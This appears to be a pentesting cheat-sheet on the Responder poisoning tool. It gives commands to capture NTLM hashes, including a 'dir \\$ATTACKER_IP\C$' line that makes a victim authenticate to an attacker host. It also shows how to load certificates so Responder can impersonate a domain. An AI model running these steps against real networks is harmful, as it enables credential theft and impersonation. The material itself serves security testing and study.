# Responder

* [lgandx's repo](https://github.com/lgandx/Responder.git)

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication

## Usage

### Grab NTLM Token

* Setup responder
```sh
responder -I tun0 -wrvd
```

* Open an Shell on the windows target and request the attacker's SMB a.k.a responder
```sh
dir \\$ATTACKER_IP\C$
```


### Impersonate Domain -- Change Responder's certificates

* After using nsupdate to add the attacker as a subdomain do the following tasks
* Add a certificate and its private key to
```sh
/usr/share/responder/certs
```
* Edit `Responder.conf`
```
[HTTPS Server]

; Configure SSL Certificates to use
SSLCert = certs/cert.pem
SSLKey = certs/key.pem
```
* Start responder
```sh
responder -I <interface>
```